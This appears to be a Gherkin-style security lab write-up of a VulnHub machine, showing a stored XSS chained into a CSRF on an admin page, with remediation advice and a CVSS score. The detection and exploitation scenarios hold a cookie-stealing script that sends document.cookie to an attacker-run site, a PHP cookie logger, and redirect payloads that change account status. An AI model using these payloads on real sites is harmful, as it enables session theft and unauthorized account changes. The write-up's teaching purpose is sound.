## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://192.168.1.76/admin/admin.php - status (field)
  CWE:
    CWE-352: Cross-Site Request Forgery (CSRF)
  Rule:
    REQ.174: R174. Transactions without a distinguishable pattern
  Goal:
    Manage to make an administrator do an action for me
  Recommendation:
    Implement a token system

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | VirtualBox      | 6.1         |
  TOE information:
    Given I am accessing the site at http://192.168.1.76/
    And it runs on VirtualBox
    And this credentials are given "samuel:fzghn4lw"

  Scenario: Normal use case
    Given I'm at [evidence](admin.png)
    """
    http://192.168.1.76/admin/admin.php
    """
    Then an admin can change an user's account status by going to
    """
    http://192.168.1.76/admin/admin.php?id=<id>&status=<STATUS>
    """
    And "<STATUS>" can either be "inactive" or "active"
    And "<ID>" the user's id which account status is going to be changed

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given I'm on the sign up section
    When I sign up a user with name and lastname:
    """
    name: <b>my name</b>
    lastname: <b>my lastname</b>
    """
    Then I can se the message
    """
    Your account was successfully created!
    """
    When I go to
    """
    http://192.168.1.75/admin/admin.php
    """
    Then I can see the user I just created in bold letters [evidence](xss.png)
    When I try a payload to steal the cookie of the one who visits "admin.php"
    """
    <script>
      document.location="mywebsite?c=".concat(document.cookie);
    </script>
    """
    And in "mywebsite" I have the code
    """
    <?php
      if (isset($_GET["c"]) and $_GET["c"]) {
          $log = fopen("log.txt", "a");
          fwrite($log, $_GET["c"] . "\n");
          fclose($log);
      } else {
          echo "Welcome to my new site";
      }
    ?>
    """
    When I visit "admin.php" and then "mywebsite/log.txt"
    Then I can see two cookies recorded [evidence](c.png)
    And one is my cookie
    And I know the other one belongs to the administrator because
    When I replace my cookie with the other one I found
    Then I can see the message [evidence](aministrator.png)
    And now I know the administrator constantly visits "admin.php"
    And I try to get the administrator to inactive vhoffmann's account
    When I use this payload in the sign-up form
    """
    <script>
      document.location="/admin/admin.php?id=13&status=inactive";
    </script>
    """
    And the payload will redirect anyone who visits "admin.php" to
    """
    http://192.168.1.76//admin/admin.php?id=13&status=inactive
    """
    And 13 is vhoffmann account id
    Then I can see vhoffmann's account is now inactive [evidence](toggled.png)
    And I can conclude the site is vulnerable to CSRF

  Scenario: Exploitation
    Given the site is vulnerable to CSRF
    And I have samuel's credentials
    But his account is inactive [evidence](saminactive.png)
    When I use the payload
    """
    <script>
      document.location="/admin/admin.php?id=11&status=active";
    </script>
    """
    Then now samuel's account is active
    And I can log in [evidence](samuel.png)
    Then I can conclude that I can exploit the CSRF

  Scenario: Remediation
    Given I don't have access to the source code
    Then I recommend following the OWASP guide for preventing CSRF attacks
    """
    https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_\
    Prevention_Cheat_Sheet.html
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.2 (High) - AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.8 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.8 (High) - MAV:N/MAC:L/MPR:N/MUI:R/MS:C/MC:L/MI:N/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-08-24}
